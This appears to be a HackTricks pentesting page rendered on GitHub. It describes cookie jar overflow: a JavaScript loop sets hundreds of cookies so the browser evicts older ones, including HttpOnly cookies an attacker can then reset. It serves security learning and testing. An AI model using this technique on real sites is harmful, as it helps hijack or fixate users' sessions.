Skip to content

Latest commit

 

History

History
59 lines (32 loc) · 3.17 KB

cookie-jar-overflow.md

File metadata and controls

59 lines (32 loc) · 3.17 KB
Support HackTricks and get benefits!

The browsers have a limit on the number of cookies that they can store for a page. Then, if for some reason you need to make a cookie disappear, you can overflow the cookie jar as the oldest ones will be deleted before:

// Set many cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Notice, that third party cookies pointing to a different domain won't be overwritten.

{% hint style="danger" %} This attack can also be used to overwrite HttpOnly cookies as you can delete it and then reset it with the value you want.

Check this in this post with a lab. {% endhint %}

Support HackTricks and get benefits!